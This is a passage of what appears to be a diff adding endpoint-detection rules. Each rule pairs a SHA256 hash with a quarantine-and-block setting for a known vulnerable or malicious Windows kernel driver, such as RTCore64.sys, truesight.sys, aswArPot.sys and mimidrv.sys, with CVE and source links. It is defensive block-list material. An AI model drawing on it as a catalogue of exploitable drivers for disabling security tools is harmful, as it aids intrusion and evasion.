"hash", + "value": "b50b11e2203942695380869c6072e15479290bc57da2ec5df3481a36b8a8561e", + "comment": "Vulnerable Kernel Driver (aka vboxdrv.sys) [https://www.loldrivers.io/drivers/2da3a276-9e38-4ee6-903d-d15f7c355e7c/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e576b0cf-5f2d-5bf9-ab56-af1e9ee29c46", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.984601Z", + "creation_date": "2026-03-23T11:45:29.984603Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.984609Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ad23d77a38655acb71216824e363df8ac41a48a1a0080f35a0d23aa14b54460b", + "comment": "Vulnerable Kernel Driver (aka sfdrvx32.sys) [https://www.loldrivers.io/drivers/2ada18ae-2c52-49b6-b1a0-cf3b267f6dc7/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e581d178-dfb6-5666-afd5-3927e99524cf", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": 
"b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.972970Z", + "creation_date": "2026-03-23T11:45:29.972973Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.972978Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8137ce22d0d0fc5ea5b174d6ad3506a4949506477b1325da2ccb76511f4c4f60", + "comment": "Elaborate Bytes vulnerable driver (aka ElbyCDIO.sys) [CVE-2009-0824] [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e5822ea3-f133-5f6f-b6a4-366101b00e48", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.983031Z", + "creation_date": "2026-03-23T11:45:29.983033Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.983039Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8a844a8d993db0ee1159b096aee959e32bb9155edd9167b1e6aad2e4019202dd", + "comment": "Vulnerable Kernel Driver (aka WiseUnlo.sys) [https://www.loldrivers.io/drivers/b28cc2ee-d4a2-4fe4-9acb-a7a61cad20c6/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + 
"id": "e5836158-e976-5d90-8850-15f829447f5d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.619894Z", + "creation_date": "2026-03-23T11:45:29.619897Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.619902Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2645298d84585fa987450aa11687b73739cbbc26abaa8125099cae5889beb211", + "comment": "Super Micro Computer dangerous update tool (aka superbmc.sys) [https://www.loldrivers.io/drivers/9074a02a-b1ca-4bfb-8918-5b88e91c04a2/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e58d1935-7b5f-5922-a990-9f48583b42ec", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.829977Z", + "creation_date": "2026-03-23T11:45:31.829979Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:31.829984Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fb087998562cc6ac2fa31eb975d6d5cb112f05590a4c0026d7261b351ee66994", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e5969a35-df2f-5d38-915a-25ea2f673383", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.460322Z", + "creation_date": "2026-03-23T11:45:30.460325Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.460334Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bac1cd96ba242cdf29f8feac501110739f1524f0db1c8fcad59409e77b8928ba", + "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e5a07acb-241c-57f5-a7ab-33ba4114581c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", 
+ "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.146655Z", + "creation_date": "2026-03-23T11:45:31.146657Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.146663Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6ec76a3ae9ae2579d0aa7e44c6338a1436fbc28bbbeb2f586f3ccea31f7a6ec1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e5a48ccf-bc66-5b65-a4f3-16546467a565", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.808686Z", + "creation_date": "2026-03-23T11:45:31.808688Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.808694Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"37299f468d95e1ad7b169792f34050353f95d6e57cd0a1e0d6b1c20f3481ee09", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e5a978f5-9c98-5931-bb3c-b3c7ccd52133", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.817696Z", + "creation_date": "2026-03-23T11:45:30.817698Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.817703Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f9db97bd12d2d734ccd86045bae1fd5fbeed106ba5cfa519e6fcd9093c1c04a6", + "comment": "Vulnerable Kernel Driver (aka dellbios.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e5abb75d-c640-518e-8919-d129d537df61", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": 
"system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.818495Z", + "creation_date": "2026-03-23T11:45:31.818499Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.818508Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "220b989ee7056dde3c5e1fbcc26b66ba23b14f3a2b1ea8ea943c7f58aa4b5a44", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e5af8ee1-e553-5193-b423-131a20178fcc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.620107Z", + "creation_date": "2026-03-23T11:45:29.620110Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.620115Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "eb71a8ecef692e74ae356e8cb734029b233185ee5c2ccb6cc87cc6b36bea65cf", + "comment": "Vulnerable Kernel Driver (aka semav6msr.sys) [https://www.loldrivers.io/drivers/142453a2-a24d-4b35-8922-6d5939f1c0fc/] 
[authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e5bd0af1-0dc9-509c-b2b9-053a2bdb4866", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.617501Z", + "creation_date": "2026-03-23T11:45:29.617503Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.617508Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "38bb9751a3a1f072d518afe6921a66ee6d5cf6d25bc50af49e1925f20d75d4d7", + "comment": "ATI Technologies vulnerable GPU flash tool (aka atillk64.sys) [CVE-2020-12138] [https://www.loldrivers.io/drivers/61514cbd-6f34-4a3e-a022-9ecbccc16feb/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e5bf72f2-173f-5150-99bf-0fab059c4e03", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.475730Z", + "creation_date": "2026-03-23T11:45:31.475735Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": 
true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.475745Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "be9a3cad35f1cc574c4ad806004a53d0d2b82e70f00677f15c2563fd93f911dc", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e5ccf01e-21f8-5477-b664-3faa190f953f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.492179Z", + "creation_date": "2026-03-23T11:45:31.492181Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.492186Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "70741d40dc7f0f7522b177846cdd4440c191f137642fa22c0eb86861dca5a6f0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e5dfcda8-175d-5a20-bb22-5334588b69f5", + "test_maturity_current_count": 0, + 
"test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.976552Z", + "creation_date": "2026-03-23T11:45:29.976554Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.976560Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "45b9eee68266d1128bc252087f4a8ae18dbb0e0b6317e28bc248b25ca2431a56", + "comment": "Malicious attestation-signed Drivers (aka NodeDriver.sys, 4.sys, Air_SYSTEM10.sys etc.) 
[https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e5e00e10-753d-565c-ad36-70b92a09e07c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.145470Z", + "creation_date": "2026-03-23T11:45:32.145472Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.145478Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4fc254af8ebfa6fc1050f65c17015b39b36693b58f029c2fa1873976cbca52df", + "comment": "Malicious Kernel Driver (aka driver_4fc254af.sys) [https://www.loldrivers.io/drivers/85335187-dae0-4f06-acea-209efaf74973/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e5e549b9-d4de-5054-a238-0f6274817a01", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.984750Z", + "creation_date": "2026-03-23T11:45:29.984753Z", + "enabled": true, + 
"block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.984758Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2a652de6b680d5ad92376ad323021850dab2c653abf06edf26120f7714b8e08a", + "comment": "Dangerous Physmem Kernel Driver (aka AsrIbDrv.Sys) [https://www.loldrivers.io/drivers/31797996-6973-402d-a4a0-d01ce51e02c0/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e603aef4-f3e1-532d-9aed-c91db07c7e56", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.618407Z", + "creation_date": "2026-03-23T11:45:29.618409Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.618415Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f583cfb8aab7d084dc052dbd0b9d56693308cbb26bd1b607c2aedf8ee2b25e44", + "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e63e5019-50e8-5685-b3c4-506e0ddea68a", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.827330Z", + "creation_date": "2026-03-23T11:45:31.827332Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.827338Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5fbe174f035e18fdd51af52d73eee45479728e84c1e9bb38c2e70ebf77301291", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e63fbe78-6f81-5590-9e60-4927ced8ff0d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.979777Z", + "creation_date": "2026-03-23T11:45:29.979779Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:29.979784Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9be868eb7e177ee6d762f2a022acf18b6b190fecbe445b3c09fc0494e8244ee8", + "comment": "Malicious Kernel Driver (aka windbg.sys) [https://www.loldrivers.io/drivers/da7314dc-6cf1-4d74-a0d1-796fc08944f8/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e645793a-04ae-59fe-aed6-07603eb92b47", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.495023Z", + "creation_date": "2026-03-23T11:45:31.495025Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.495030Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7788872dc0b5c9b870e18c1be9bfd50e42b3149aff2b6322f3c23f6a4a342342", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e650a3a2-df01-5f66-b36d-9868fd9b4f39", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": 
"critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.968668Z", + "creation_date": "2026-03-23T11:45:29.968670Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.968676Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "66a43661e2bd1e3c1d8f5c3eabd7a7861c5edad3d0fe54d52b26a5ce04f2d874", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e653e82d-b981-588d-baba-e5a8c5c93292", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.159498Z", + "creation_date": "2026-03-23T11:45:31.159501Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.159507Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"91a13c74aaf017149e1ab5295b93fe98adaec813e6b33c36d7b3ca813e706961", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e6562402-d386-5cb9-98a3-aa45e0672d4c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.470553Z", + "creation_date": "2026-03-23T11:45:30.470556Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.470565Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0fe7b0aaeb4b93840492f7d299a5ac481feb74296afcda1da4214db40856f003", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e6654aca-70eb-5793-90c5-4b61d2300745", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": 
